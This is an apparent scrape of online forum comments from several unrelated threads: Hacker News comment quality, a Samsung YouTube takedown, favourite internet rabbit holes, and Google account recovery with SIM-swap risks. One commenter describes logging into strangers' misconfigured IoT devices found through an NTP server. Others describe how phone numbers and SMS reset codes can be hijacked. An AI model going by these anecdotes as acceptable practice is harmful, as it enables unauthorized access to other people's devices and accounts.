I also suspect that early comments dominate late comments by the time factor alone. The sorting algo gives a brief advantage to new comments, but old comments are more visible. A post on the front page gets 30+ comments in the first hour, and latecomers can only post into the void. To address that, long branches could be collapsed by default, leaving only 2-4 visible messages per branch.

HN comments are full of naive political opinion, groupthink, and a tendency to blind optimism on all things technology or new. Often older ways have merit too.

It's also probably the only place left on the net where, from comments, I'll find out rapidly, and bluntly with citations, when I'm wrong (and, yes I'm often wrong on the Internet!), usually learn something new on the topic, and sometimes talk with the guy who invented it. My ADHD brain loves the depth that side topics can get explored and being surrounded by people far cleverer than me.

I think HN needs a way to easily find the top comments. There are absolute gems deep in discussion threads, but you'll need to spend a lot of time reading to find them. Hence, it's very nice of Dan Luu to list some of his favorites.

The top root-level comment for each comment page is obviously easy to see, but good comments deeper in the comment tree are easily lost. Would be great if e.g. the top 5% voted comments on a page were highlighted in some way.

Perhaps a workable solution would be to just follow the comments listing of smart people. Guess I'll at least try that.

Recently I've been thinking about doing a couple blog posts that summarize the HN thread for a given article* in perhaps ~1500 words. I think of it like the approach that r/tabled uses for AMAs on Reddit (example: [1]).

Would others find this interesting, or would you rather just read the comments yourself?

A second idea is a daily / weekly update of comments from all of the people you're interested in "following" on HN. You can do this very manually right now. I think it could be an interesting proof of concept.

*When I say one article, I really mean the aggregate of recent links around that topic as discussions are often merged or commenters bring information from other sources into the commentary for whichever link takes off on that topic. Often that is the most original source, but not always.

I absolutely love comments on HN and they are probably the main reason I read this site a lot. Some times, the posts themselves are quite self-explanatory from the title and I just go straight to the discussions.

These criticisms, when phrased in the manner of the post ("HN is full of mean and rude people"), suggest by omission that there's some kind of internet forum Nirvana out there where everyone's nice all the time and nobody every says mean things or is rude. ("HN is full of mean and rude people [... unlike place X, which is always great all the time]")

But the thing is, once a community reaches a mid-to-large size, certain kinds of people will always going to think it's full of jerks and trolls, and that its golden age has long passed--regardless of the community's age or actual composition.

I run one of the largest online writing communities online, Scribophile. We've been around going on 9 years and I personally pride myself on the reputation we've earned as being a friendly and supportive community. By and large people seem to agree. And yet every now and then we still get people complaining that Scrib members are out to get them, that everyone is mean, that Scrib's golden age has passed. (I started hearing that same golden age comment about 6 months in, by the way).

I think the truth is more like the faceless, voiceless, anonymous internet makes it really easy for people to both a) be jerks, and b) misinterpret harmless posts as people being jerks. I think this phenomenon happens in every mid-to-large sized community, ever. And I don't think it's really helpful to criticize any community of that size as having nothing but mean people, or trending towards meanness.

I often find my self searching through old HN comments for all kinds of things. Just off the top of my head I've searched for comments on: Redis, ZFS, Raft, SQS, ZMQ, message queue, RDS, connection pools, ECS in the last few days. I've learned quite a lot of things from reading comments by people with way more experience in these matters than I have. And that's probably less than half of my searches. A google search might give me some good stuff, and Stack Exchange too, but HN comments are indeed underrated.

I prefer cynicism over unthoughtful, inconsequential comments that floods several discussion forums that I have come across. "Nice article", "Great write-up" and the next thing you know, you have created a place where people are only interested in submitting their articles and getting it upvoted rather than make meaningful contributions.

People want to make good contributions here and that's something that differentiates HN from other news aggregators.

I greatly miss Usenet newsgroups -- NNTP ones, not yahoo or google groups, or any of the pale http immitations. The best were usually moderated of course, but even unmoderated ones often had high signal to noise. I imagine how they might be now with rich text rendering, e.g. embedded TeX and images.

Good newsreaders (MT-Newswatcher on MacOS springs to mind, but also fast console programs like tin) really helped. There were no 'likes' or 'vote' buttons. But there was the ability to whitelist or blacklist certain authors by adding them to a user's 'killfile', leading to the wonderfully pithy permanent downvote reply:

I miss the deep expertise often on display on forums like slashdot in the past which is conspicious by its absence here.

In many ways this is more of a professional board than a personal board. A lot of folks here are in the profession and don't seem to speak their mind, lest they lose career opportunities. This also seems to promote an affection of expertise and authoritative tone even on subjects commentators may not know much about.

There is offhand dismissal of dissent as 'resistant to change' and a serious lack of scrutiny that often allows broken technologies and services to be hyped endlessly untill people come back months or years later to report deficiencies but by then the train has left the station.

And any forum that promotes downvotes to signal dissent cannot by design promote diverse discussion and will naturally coalesce around a 'socially acceptable' consensus.

Reading this article and thinking back on the users on HN that I do enjoy reading comments from I think that a neat feature may be the ability for a logged in user to "favorite/mark" specific authors. Those authors only get some particular character in front of their name (or a different color) so that they stand out more. I do agree with this post about seeing certain names and knowing that the signal ratio will be higher is nice. May just need a better way to discern those when scanning a comments section.

I wish there was more research in moderation systems. I think it is a fascinating topic, because it can make or break an online forum. And perhaps it even has applications in political decision making.

Comments (and previously blogs, but not so much anymore) can have more insight than news articles because they're based on first hand experience. Journalists don't have that, and the organization they work for often has problematic incentives which they push onto the writer.

HN comments are indeed very terse, to the point of being unfriendly. It bothered me at first but now I'm used to the style and sort of like it.

The comments on that "Lenovo is blocking Linux on some new laptops" story a while back were truly abysmal. I think that's the only time where I was really disappointed by HN comments. Now obviously (and as many of the more thoughtful commenters pointed out) this was just a case of missing support in the Linux kernel. There was no "secret deal" between Lenovo and Microsoft that the customer service rep on that forum revealed. Intel posted some patches to fix this a few days ago: http://marc.info/?l=linux-ide&m=147709610621480&w=2

This article and its comments are surprisingly negative. I've long held the opinion that HN is the best aggregator out there, and the comments are top notch as well. Far better than Reddit, subreddits like /r/programming+sysadmin+netsec etc, /g/, Slashdot, and the list goes on.

My feeling is that a large enough part of Hacker News has been any time within the last 10 years actively contributing in Stack Overflow. From my own experience, I learned how to ask/answer technical questions and participate in a technical discussion there while trying not to keep it political, and I totally feel that has helped me to provide good comments in HN from time to time.

So I would challenge the sentences:

> And yet, I havent found a public internet forum with better technical commentary.

I have, it's StackOverflow. Even though it is not a public internet forum properly, I've found there some awesome technical commentaries there and I think it might have helped HN a lot on that side.

> when people make comments that arent just reasonable sounding but are actually correct, those comments tend to get upvoted

For a while, I found that on pages with lots of comments the most interesting ones were to be found at the topand, buried between actual dross, at the bottom.

That might have changed, I don't see it that much anymore. But that could be a side effect of something even less desirable. I think some people may have started flagging whole articles when the discussion has "too many" comments they dislike. I can't prove this, of course.

This article and the (currently) highest rated comment with the Medium article is making me want to write more.

I've always considered a simple blog where I just write short commentary on articles I've read that I feel are incorrect or incomplete. One thing that has held me back is knowing I'm not a brilliant writer. However am going to try and keep in mind the great blog post by Paul Graham that stresses to always write in short sentences. Good luck me!

Coming from a certain frame, context and worldview given to someone by his/her parents, many comments are not ill-intendend but come off as unhelpful or negative. A problem with moderation on the web is that for willing people it is hard to grasp why you have been given the mdoeration you got.

An idea I'm toying with is to allow meta-comment reactions to comments. They would extend horizontally (as opposed to vertically for non-meta comments) and allow medium-to-high experienced users to provde meta-comments (feedback).

> For the last couple years (ish?), the moderation regime has been really active in trying to get a good mix of stories on the front page and in tamping down on gratuitously mean comments. But there was a period of years where the moderation could be described as sparse, arbitrary, and capricious, and while there are fewer bad comments now, it doesnt seem like good moderation actually generates more good comments.

I agree that there was a major change in moderation 1-2 years ago. But I think it's worse rather than better. The moderation is more arbitrary and capricious now (in particular it's a lot more active during the hours when the US is awake), and there are a lot of positive-but-contentless fluff comments and even humour, both of which are inimical to what made HN great.

Yet another humanbemoaning the fact thatwhen myriad humansrandomly get together onthe internet, some folksare clueless, some folksare not nice, some folkswrite poorly, etc.There are things that canbe done to improveonline discussion. Butexpecting everyone to beequally knowledgeable,savvy, etc is simply not areasonable expectation.

> comments are often gratuitously mean, and people will often defend gratuitously mean comments by claiming that its either impossible or inefficient to convey information without being mean.

> Most of the negative things you hear about HN comments are true.

I think it is interesting how the relatively anonymised nature of the internet has a similar effect on people of all stripes. HN readers, I believe, are among the more intelligent, or at least curious, in our species. The same is true of another popular internet forum, Stackoverflow. Yet there exists an air of negativity that is of much higher ubiquity than in "real" life where people are not anonymous. And this is true of most other internet forums as well where more of the general popular participates. I think it shows in a strange way that people just have a lot of negativity to vent, and the internet has made that really easy and without consequence to the rest of one's life, and that this remains true regardless of one's interests and general intelligence.

So true. I often jump to the comments before I read the linked article. The comments a very often of better quality and more informed than the article it self. HN is unique in today's internet it's a great community and I hope it stays that way.

HN comments are moderated (not the moderators which are completely fine and, in my case, always clear of what was off-topic and in need of flagging, but the community that flags) by the hive-mind that is like any hive-mind against diversity.

Of the dozens of accounts I had, some have reached karma levels of awe, and some were met with extreme flagging and disapproval.

The most pleasant and interesting discussions are mostly in the technical, scientific themes.

When it comes to diet, lifestyle issues, comments are overflooded with bunch of anecdotal claims, unscientific babbling and extreme boasting.

I come here for the content. Before I started frequently coming here, I used solely reddit. I didn't "get" HN at the time.But at some point it started growing on me, I started coming here more and more often, and right now it's my primary source of random information. I still reddit, but more for leisure and time wasting than anything else.

I don't check comment much, thought.

As a side effect, it had also changed my browsing customs; before it wasn't difficult for me to go down to the 10th page on reddit.

The truth is that more articles than comments are waste of time (as comments are often a lot shorter or simpler to grasp) so I have to disagree here: I often find myself reading the comments before clicking on the article to save me time. And I'm not the only one.

I feel the same. Most often, the comments are way more interesting than the links they're commenting. This led me to calm down on commenting all the time, coz I felt like I needed to try to make good quality comments in order to compare favorably to the rest of the discussion, and to contribute to the community. I wonder if others feel like this and decided to restrain on commenting?

I would like to propose wikipedia edit history and comment deletion milestones for the hn comment system, and in addition, a comment redaction facility that works like redaction of classified documents.

A way to reduce disruptive comments might be to make one downvote cost one karma point.

Down-voting should be for disruption, not ignorance. Ignorant comments are fine. Get them out there so they can be aired and corrected. Laymen get to know what they think. Experts get to know what laymen think. Occasionally there's a good idea.

Talk is cheap and we should do more of it. The alternative is people being far more ignorant than they already are. But silently, in private, with more potential for harm.

The bellwether of a bad but possibly technically interesting HN comment is one that begins with a humblebrag: "One time a Fortune 500 company hired me to re-write their entire web tier using Django" or "last year, for fun, I wrote a fully-functioning TLS implementation in node".

Such nonsense (or at best, unneeded information) is intended to provide credentials so that the reader will take what follows more seriously. But ironically it only serves to erode confidence.

Wonder if the attention put on YouTube here will inspire Google to fix the financial and political 'infringement' takedowns.

Eg, during the takedown process, have something like:

> [ ] I understand that satire and political commentary does not in itself consititute copyright infringement, and that I am not filing this notice on the basis of the video satirizing or making commentary on my copywritten content.

> [ ] I understand that incorrectly flagging satirical or commentary videos that mention my trademarks but do not infringe upon my trademark rights may delay response to future infringement filings.

Or something similar. IANAL. Complainants must tick the boxes to be able to submit.

Here we are again, and this thread is full of comments about whether this was afoul of DMCA or whether there's a way to adjust the system so that these claims will be more costly to the claimant.

We need to break open the head here, people! We're scientists, right? Step back from your political ideologies and your fears and tell me what the real problem is with this biological system.

Right: it's that a single actor can make the decision to censor these things. It's fundamentally a weak link problem.

Whether or not we fix DMCA, which I'm sure we will, we need to fix the problem that the weak link exists in the first place. A centralized Youtube will not do for the information age. Our organism must build immunity such that, no matter the tantrums of the state, nobody is capable of giving in and handing over the lollipop.

It's a funny story but also shows how pathetic (IMO) some companies and organizations become. They just don't realize the cat is already out the bag. "Damage control" should not be used for censorship. This is clearly fair use (satire).

And in general about YouTube and similar companies: This is what happens when the court principle of innocent until proven guilty is inverted to be guilty until proven innocent.

There is a reason why freedom of speech is the first amendment in the US constitution, and Google (and other companies) should adhere and respect the intentions behind it.

This is why we need strict, very harsh penalties for abuse of copyright (and patent laws). This has NOTHING to do with copyright, yet these Samsung assholes file claims with Youtube? How about 1% net revenue fine for every wrongful copyright claim (like, but not limited to, a bad DMCA claim), increasing by 1% (with no limit other than at 100% you lose the business) for every wrongful subsequent claim? But of course, this will never happen. Personally, I see these kinds of attacks as justification for piracy and the willful disobedience of our incredibly stupid laws (in the US).

I don't know what's the most abused laws are, but I'd say copyright would probably be in the top 10 list if there was such a list. I wish people who abuse copyright takedowns repeatedly would get a large fine. Then the fine should be split between the uploader and service provider. Plus the takedown abuser should have to pay all legal fees on top of the fine.

Maybe this has nothing to do with DMCA and more to do with Samsung spending millions of dollars in advertising on Youtube (speculation). If one of your major sponsors threatens to pull back advertising dollars, that supports your platform, maybe you bow to their requests. Maybe.

Samsung must really not want to be in the mobile phone business anymore. The dim-witted actions they're taking in regards to these videos will only turn more people off. I for one will never consider a Samsung product now, and not just their mobile phones. They're set to join Sony on my relatively short "do not buy" list.

I guess Samsung will keep a lonely Sony company on my "do not buy list", too bad. BTW, in the US, last I heard Parodies is a protected form of speech. So I think DoctorGTA has the law on his/her side (assuming he is living in the US).

These people are so dumb and just don't get "it." Samsung is so dumb, they are very dumb, for real. So dumb, so dumb, so dumb, so.... they climbing in your windows trying to rape your GTA and youtube accounts. ([0])

All this is going to do is encourage tens of thousands of young kids to figure out what things like "DRM", "free speech", "EFF", "privacy", "copyright" and the like mean. Maybe we get a few good lawyers out of this, a lot of great parody and a lot of great art.

I stumbled into Venkat's blog about two and half years ago and I'm still trying to find my way out. The rabbit hole gets even deeper when you look at his list of recommended reading. The material on John Boyd and OODA loops in particular has been bouncing around my head for about a year. Ribbonfarm quickly turns into a choose-your-own-adventure type of experience as it's very easy to bounce between articles and start looking everything that you don't know.

If you're interested in getting below the surface level of how organizations, teams, and business cultures work Ribbonfarm is the best place I know of that really digs into the details. If you're expecting the typical "be a leader, not a manager" platitudes, then you'll be disappointed.

My current rabbit hole has been the world building stack exchange (http://worldbuilding.stackexchange.com/) which is (ostensibly) for writers working out scientific or historical justifications for the worlds they invent.

Some of the thought that goes into answers is really cool. Good ones from recently are:

The US Civil War has been mine for the last couple of years. The sheer volume of history and contributing factors, decades of build up, aftermath, affects on the US today, etc. My goodness, the economics of the whole thing are just fascinating.

All the internet debates I saw when the confederate flag came down got me really interested in how so many people could know TOTALLY different things about the most historically significant event in the country.

Now I've got about 12 books covering things in different ways (and there are so many more). Thanks to the Library of Congress and Google's efforts to scan books it's really easy to check citations as you read when you're having those "There is no way that's real" moments followed by "Holy crap! That's real?!?!"

The whole thing has sparked an overzealous interest in history, which is the subject that interested me the least when I was younger. Now I give serious consideration to pursuing a doctorate one day with the aim of being a History professor when I get closer to 50 (which is still a decade or so off).

I'm partial to everything2.com. Back in the early 00's, everything2 tried to be a Wikipeida, where people could post multiple entries on a topic. The best part is reading 16 year old, long form essays about places. The recent stuff is short stories, but the essays of the bay area from the peak of the bubble are fascinating.

I always find the EAS activation tone to be kind of bone chilling (which I suppose is its intention). I hear it so infrequently here in Canada that it really grabs my attention immediately.

Listening to the fake ones online probably makes it worse, though. When I heard the emergency alert tone come on the radio while driving from Toronto to Ottawa, I checked the skies for UFOs. Ended up just being a tornado warning. :)

TVTropes is the big one, the vortex from which all other rabbit holes stem.

The SCP foundation is also excellent, and The Digital Antiquarian is my new favorite.

Fallen London is a browser MMOCYOA on steroids, and it's glorious.

The Jargon File (before ESR ruined it with the latest round of updates) was amazing, and still is great fun.

Bash.org is another classic rabbit hole, although far from the best for that purpose.

And Youtube contains many rabbit holes, but my favorite by far is Tom Scott's youtube channel. Also of note is Tom & Matt's Park Bench, where he vlogs with Matt Grey on a semi-regular basis, Yahtzee Crowshaw's channel, where he used to play games with Gabriel Morton in his "Let's Drown Out" series, and Channel Awesome. Just, all of Channel Awesome.

The Bureau of Labor Statistics (http://www.bls.gov/) is just fascinating enough and just badly organized enough that I never seem to be able to get to the same useful piece of information twice. And thus I constantly find myself looking at other interesting facts about the US labor force.

I grew up when the History Channel was nicknamed the "Hitler channel". I've read Manchester's the Last Lion, Shirer's The Rise and Fall of the Third Reich, and will soon be ordering Ullrich's Hitler - Ascent. Saving Private Ryan is in my top 5 favorite movies of all time.

Back in the mid 90's there were 2 rabbit holes I loved to visit. One of them was the Monty Python website :-)

The other one I haven't been able to track down. I'm hoping someone here can tell me what happened to it. It was an art site called "The Place" hosted by a university in Canada. It was a mixed media site with art, poetry and short stories. Does that ring a bell for anyone? I loved that site and wanted to visit it again many times. But "The Place" is a difficult term to search with these days.

I listen to Robert Greenberg's classical music appreciation audio courses. He has published courses on Bach, Mozart, Beethoven, Liszt, Schumann, Mahler, Verdi, Wagner, Stravinsky, Tchaikovsky and also on horizontal subjects such as orchestral, piano, opera, baroque music, romantic music, symphony and quartets (and much more).

Greenberg is a gifted speaker, a composer and and music professor himself. He's sharing with us a burning passion for everything classical. If not for the informational content, then at the very least it's worth listening to him in order to infuse with his passion.

After taking some basic notions about composers and music genres, I started a YouTube safari for unknown music and composers, I am 7 years into my search already. I listened to hours of classical every day since I started. YT is a treasure trove of historical recordings, you can do comparative listening and refine your listening abilities.

There are so many composers almost nobody heard about, even professional musicians, that it's mind boggling. After all, there is a long history of classical music, hundreds of years in the making, and the level attained by Bach 300 years ago was already (and still remained to this day) cutting edge.

Imagine how interesting it would be to browse videos and papers from 300 years history of computer programming. We are overwhelmed even with the production of the last decade. Classical music has such a wonderful deep history that is endlessly entertaining.

Currently my favourite time wasters are learning channels on youtube. Especially not the "weird" ones like VSauce because I think those are pretty unwatchable. I like SciShow / SciShow space even though that's borderline weird :)

It's a little bit dated now, but the C2 wiki is a fun place to read about software development. There are quite a lot of patterns, anti-patterns, practices, rambling debates and just generally interesting ideas:http://wiki.c2.com/?DesignByCommittee

Orion's Arm is a collaborative world building project for the far future. The articles on monopole physics and wormholes are quite detailed, and the implications of higher levels of sentience are very interesting. http://www.orionsarm.com

Reading about neolithic archaeology is way more fun than you might think. 10,000 years ago people built these huge sites with literally stone age technology, and the nature of their rituals and beliefs are mostly unknown.

Shodan is a search engine for devices on the Internet. Looking at other people's queries is a good way to get started. Every time you think, there's no way someone would connect one of those to the Internet, you find out that at least 10 people have gone and done just that. https://www.shodan.io/explore

Running an NTP server in the public pool gives you the IPv6 addresses of all kinds of whacko IoT stuff. Every once in a while p0f can't figure out a TCP/IP stack that's connecting to my server, so I connect back and there's sometimes a really weird device with an open telnet or HTTP port or something. About once a month I have to call someone to tell them that they misconfigured their firewall when they turned on NTP and I'm logged into an air conditioner on a cruise ship or another bizarre combination of thing and place that I never thought I'd ever say out loud. Browsing the logs is a never-ending source of amazement.

PSA: connecting to public NTP servers exposes you to people like me, don't do it unless you have to.

I have my mythtv set up so downloaded conference videos show up as a channel just like a recording on my mythtv system, so I can just sit on the couch and watch a clojure conf or whatever just as if it were a recorded PBS program. Very convenient.

As a side issue I raided archive.org for hilarious black and white silent films of Buster Keaton who was quite a comedian about a century ago.

It has links to architects and those pages in turn have links to beautiful buildings. Also the wikipedia pages of art museums tend to be awesome timesinks as well, you can click through every artist and all of their famous artworks.

I don't use YouTube at all for music recommendations/discovery but every once in a while, I'll chance upon something amazing.

A comment on an upload of Seventh Wonder's The Great Escape[0] led me my discovering Shadow Gallery's First Light[1], which I enjoyed almost as much. (Almost. SW's track, based on Henry Martinson's 'Aniara' poetic cycle is, in my opinion, at another level. Martison was awarded a Nobel prize for his work but unfortuntely commited suicide as a result of fierce criticism against this decision).

* Rogue waves (it is not that deep of a hole but for some reason I find it interesting).

* Knot theory and category theory (again not sure why).

* Social Psychology on wikipedia

* Ben Thompson's Badass blog (more for humor and a little old now. not sure if it is updated) [1]

* If you are an older mid to late 30 something like me X-Entertainment [2] used to be an awesome rabbit hole (no it is not a porn site). Sadly it is very very broken rabbit hole with collapsed tunnels all over. The author's penchant (Matt) for 80's crap ultimately succumbed to complete utter disorganization and proper backups. It is a 404 wasteland. I recommend googling "x-entertainment and he-man" (yes it is scary to google such terms but trust me)

Encyclopedic, opinionated, humorous, and even quantitative guide to 20th century pop and rock, from the point of view of a Russian Linguist [1] who thinks The Beatles, The Who, The Rolling Stones, and Bob Dylan have never been topped:

Even if you disagree with him on details, if you have similar taste, you can basically look up any album and see which songs might be hidden gems. It's also amusing to read his take on just when a particular band began to decline in quality.

damninteresting.com is where I 1st read about the Great Molasses Flood, amongst a slew of other bizarre non-fictional events & people. The wordsmiths make the bizarre accounts even more damn intetesting.

2) reddit.com is a never ending source of entertainment if you know how to use it:

2.1) Go to any sub which kind of interests you and sort either by "top" or "controversial" for "all time". "controversial of all time" is especially interesting if you apply it to subs like /r/relationships (if you are into that kind of thing).

My favorite channels are This Old Tony (his newer videos are incredibly well made and very funny if you like dry humor. Check out his video on how to cut threads on a lathe https://www.youtube.com/watch?v=Lb_BURLuI70), Abom79, Clickspring, Keith Rucker, Keith Fenner, Stefan Gotteswinter, Walter Sorrells, ...

San Diego Air & Space museum archives. Currently they have a quarter million photos there and they're uploading new ones constantly. They have received a huge number of collections from very interesting people. Where else can you see original photos of Glenn Curtiss' first airplane, crashed zeppelin skeletons from World War I and hyper advanced Convair Centaur rocket stage manufacturing? Fascinating people in the photos too.

John Baez, this weeks finds in mathematical physics [1]. He started blogging this in 1993! there's so much stuff there now. I keep finding amazing things in the TWF's, and not wanting to close my browser tabs because it's so precious. And you wouldn't believe what he can do with a bit of ascii art. Truly he is one of the heroes of the internet. (He doesn't do TWF's anymore, but there's a bunch of other places where he posts stuff.)

Try this one for starters [2]. The earlier ones are much more hardcore.

Very recently I've spent a lot of time on ai.stackexchange.com and electronics.stackexchange.com, so I guess both of those are in contention.

Even more recently, I've been indulging some nostalgia related to my time as a firefighter by spending a lot of time on Youtube looking at videos of structure fires from around the world. It's kind of addictive to play "arm chair incident commander" and sit there going "why'd they stretch a 1-3/4" line instead of a 2-1/2?" or "why didn't the first in engine lay their own supply line" or "why aren't they using elevated master streams here", etc., etc., etc.

These two channels together will give you everything you need to get started and document close to every known glitch in the pokemon games. Well that and perhaps TRRoses old website for background on what exactly is going on in these videos, but that got taken down. Bulbapedia probably still has what you need though:

This is a Tumblr blog going back years of extremely disturbing medical imagery and art of the same style. Oftentimes there's almost no context given to the pictures other than a name of the author or a title which makes them that much weirder. The images also tend to be associated with fascism or BSDM. I've spent at least a few hours trying to find more about some of the pictures because they were just too weird to go without explanation. The guy has one post about how he really values quality and obscurity in his images and nothing else; no explanation as to who he is or why he collects such horrible and terrifying art. I've always wanted to email him and ask what the hell is going on but I'm kind of scared to know.

Patients given excessive doses of radiation. Lost and stolen troxler gauges and their recovery (or not.) Reactor SCRAMS and their various causes, artfully downplayed with technical jargon. Drunken contractors escorted off reactor sites. 30 year old flaws discovered in power reactors.

Ok, now I have +20 tabs open and I'm only halfway through the comments.We know how most of the times we are compelled to read everything in a page until the end, but we also know how much does this attitude costs to us.

So from now on I will stop reading and only take in consideration those links who will be posted in response of this comment, if any. Let's see if magic, or coincidence, works!

I advise you to do the same! (If only we could come up with an acronym for this thing!)

Fun to just peruse the stories and spend an hour or two reading. Some of them leave you shaking your head, others leave you feeling warm and fuzzy. And yet others make you want to defenestrate printers... Who knew how much fun* people had in tech support and IT?

The start of World War II, how Adolf Hitler came to power in the Weimar Republic, why the Nazis gained power and what motivated them to do what they did. I'm especially interested in the "unknowing participants" of the Nazi regime, like Wernher von Braun and Albert Speer. People who basically bought in to the ideal of a better German world and didn't really consider what that might cost in money, lives, and culture.

Like many others, my productivity has suffered since Wikipedia became a thing. You may consider me a wiki-binger. I even made a simple webapp to curb my addiction: http://www.wikibinge.com/Still haven't come out of the rabbit hole.

The Giant Bomb [0] and if you are a premium member [1] it's even better. There are hours of timeless premium only videos and podcasts. If you like video games at all or have any interest in video games it's worth every penny and second invested.

Search anything medical. Don't know what a word means? Look it up on wikipedia... recursively. Read cited studies. Read studies that cite studies. You could spend the rest of your life reading this stuff. I've been doing it for years.

I don't have a favorite rabbit hole but rather I've developed a link-hopping habit that pretty consistently leads down the rabbit hole. Basically, while looking at a site/article that interests me, I usually end up doing a separate search for any concepts or organizations mentioned, then seeing what they have to offer. Rinse and repeat.

Speaking of alternative world views and world building... I recently fell into a Wikipedia hole reading about the Islamic view of Angels, King Solomon and how he bent 72 demons to his will, Renaissance magic, and Hoodoo.

The Getting Stronger blog is another wonderful health and fitness blog which focuses on training the mind to thrive in difficult conditions, though it has really amazing insights on diet and training as well: http://gettingstronger.org/about-this-blog/

Because Google doesn't have humans reviewing anything unless there's a direct link to marginal revenue/cost avoidance attached to that interaction that can be priced in. Their business model is to achieve scale through automation and machine learning; which means not doing things that would require manual intervention unless absolutely required.

Explicitly, this means that for free services like Gmail, humans aren't involved. Ever. Try getting support for a Google product and you'll see what I mean -- there's not even a phone number to call or an e-mail address unless it's a paid product (and even then, they've got a less-than-stellar reputation for support of paying customers).

Recently my wife, without any identification, went to Tmobile and was able to have my account automatically canceled and added to a new joint family account.

She went with my knowledge, but TMobile never called to confirm.

After which my phone no longer had service, and I had to install a new sim card prior.

While she did this with my knowledge, I no longer have access to make changes to the account, until she adds me to the list of authorized people, and I lost all my voice mail.

It's very disturbing that she could do this, without any sort of checks and authorization.

Also, FWIW, my wife and I do not share a last name, and she did not provide anything other than my phone number to TMobile. She was a new Tmobile customer, and I was an existing customer, albeit on a very cheap pre-paid plan.

I don't think it's possible to make a Google account without a phone number anymore. It's really unfortunate, especially because I deliberately don't set up fallback contacts for my "alternate" gmail accounts, and Google keeps locking them as suspicious when I log in from a second location, and I need to "verify" with a phone number any time that happens (at which point I abandon the account).

I understand that they want to fight spam, but I'd be willing to spend 5 minutes doing captcha type activities in exchange for not requiring a phone number, and that should pretty severely rate limit account creation.

> This pattern seems like something security software should be able to detect: a password reset with incomplete information, followed immediately by a change in recovery email, name, and two-factor-auth settings, coupled with a my account has been compromised help request is highly suspicious.

This series of events could easily occur in legitimate cases. Say you lose or destroy your cellphone. Since you only ever logged in via your phone you don't know the password. Your recovery email was attached to a service you don't use because you normally use gmail. I'm not saying this scenario is a good idea just that it's probably quite common.

As a software developer I often hear from well meaning users that are appalled that software didn't do-the-right-thing in some complex scenario that appears to have an obvious solution because the desired outcome in obvious. In reality, handling the corner cases is complex. Adding these obvious solutions to the code easily leads to even worse situations.

I guess 2FA using an authenticator app is the way to go for now. Do you guys agree with the removal of backup phone numbers recommended here? Seems reasonable to me but scary; I've lost my phone(s :( ) before. I do have backup codes generated though.

Once I had my SIM card stuck in my phone. So when I wanted to use a different phone, I bought a new SIM card kit online and brought it to a T-mobile store. I told the clerk my SIM card is stuck in this phone so I want to transfer my number to the new SIM card. He asked for my phone number then scanned the new SIM card and transferred the number. I didn't have to provide any identity or proof that I actually own the number. It's scary how easy stealing someone's phone number can be.

Kind of related, but any Googlers here? Can you please make Google send notifications whenever someone tries to log in to an account and is required to do anything other than typing in their username/password? I REALLY should know when someone is trying to respond to a 2FA prompt or answer my security questions or use SMS or email to reset my password... it's ridiculous that these don't all result in emails right now.

Another issue with sending Google verification reset codes over SMS is that a lot of "Google Phones" allow for viewing text messages/headers while the phone is "locked." Therefore if you leave your phone (even for just a few seconds), someone could quickly gain access to the reset vectors. In looking at the DNC leaks for example, if an attacker had the phone number of a high-profile target, locates them in person, and then execute a reset "event", they're now in very serious jeopardy, assuming attacker gets physical access to the target's phone for just a few seconds. (Edit: Attacker might have the ability to also view their phone through a high-resolution camera(s) as the target pulls up the text message. Thus allowing attacker access to codes without physical access to device.)

If you are ever required to give a phone number but don't want to then you can use an official fictional one. This means no-one else will have access to it (or be annoyed by it). Same with email addresses.

Using a phone as a login credential is risky from a reliability point of view. At least with passwords and security questions you can (in theory) have 100% dependable access to them anywhere in the world if you memorize them, back them up, or put them on an encrypted USB flash drive or in an encrypted cloud location.

You can't do that with a phone. You can't duplicate your SIM card. If your phone is lost, broken, stolen, or your service is cut off or unavailable for whatever reason, you're screwed. At least with passwords, security questions, or hardware tokens (of which you can have several), you maintain reliable access no matter what if you've made backups.

I think with centralization comes control, arbitary rules, surveillance, potential for abuse of power and loss of end user control.

The fact that it keeps on becoming more and more difficult for individuals to run mailservers cannot be a coincidence.

The solution is decentralization at least for things like reddit, mail, search, social and other similar services. Multiple discrete 'old style' forums, search services, email providers and individual servers with dispersed control cannot be easily silenced, surveilled or subject to arbitary rules.

I think the usual response is people don't care but I think that's because they don't know and may not have stopped to consider the consequences. And perhaps more important before they didn't have to care. Now increasing creepiness from centralized providers means sooner or later users will wisen up.

If parents for instance become concerned about privacy issues they will go out of their way to protect their children and this can lead to new more privacy aware services, rules, and distributed applications. It also makes centralized unicorns based out of SV less of a desirable thing.

Huh. I wonder if the author had seen this video https://m.youtube.com/watch?v=Q00OZ_Xk24w which describes a similar story and recommends a solution based on the same factors (2FA on a number no one knows under a fake name).

But anyway I don't understand why he thinks it's some kind of shocker that this makes it less secure. It's another access method. Recovery options are obviously attack vectors.

In Turkey, if you apply for a new SIM card (let's say you have micro and you want nano) then you cannot access your bank account (for example Garanti Bank, probably other big banks too). Doesn't matter whether you try to access the bank via your PC or phone or via your home telephone, a massage appears saying that your SIM card has been changes and thus you need to re-validate yourself. So, this means that the banks and mobile operators share data.

Plus, if you apply for a new SIM card and you have a changed information in your ID, such as your father's has changed his name or you have corrected your birth place, then your ID is send to the government and only when the government gives a permission then they can give you a new SIM.

Two years ago, I added a friend on to my phone plan so that he could call his sick mother. I made it clear to Telus (my carrier) that he should not be able to modify the account or discuss account details with them, and they assured me that he wouldn't without both my PIN and express permission to add him to the account administrators list. Three months later he walked into a Telus store and got a new iPhone with a 2 year contract on my plan. When he stopped paying what he owed, guess who got stuck with the early termination fee?

All of these require you to provide them. Phone number is given as XXX-XXX-XX12. Email is userna*@domain.com.

Failing all of those options, Google asks you to provide an associated email to help with recovery. It then provides a freeform text field for you to explain the situation and expect a response in 3-5 business days. If you have a secondary less-secured email address this could be a viable vector.

tl;dr two factor seems to add an additional layer of security / accounts that an attacker would have to compromise if appropriately configured. Recovery options weaken your security and you should be cautious when configuring.

Does anyone know anything about the security with regard to using other providers (e.g. twilio or google voice) as a recovery number?

Let's say my recovery number is actually a google voice number that's connected to a separate google account, but not forwarded to my actual cellphone (i.e., I'd have to login to my other google account to view the recovery code). Thoughts?

When I set up my 2 way authentication, I noticed my account has a phone number added, which I don't recognize at all. The phone number has a Florida area code. I have never been to Florida. I emailed google about this, asking how the number was added? I didn't get any reply.

I think that for a lot of people, the added access is worth the security risk: they're more likely to forget their own password than to be hacked.

One of my moms friends had gone through the Gmail password reset process a few times, but she but she called me one day kind of frantic because she could no longer reset her password (or remember the old one).

It seems that previously Google had allowed either a phone call or an SMS to the phone number on her account, but had recently taken away the call option. Her phone was a landline that couldn't receive SMS messages.

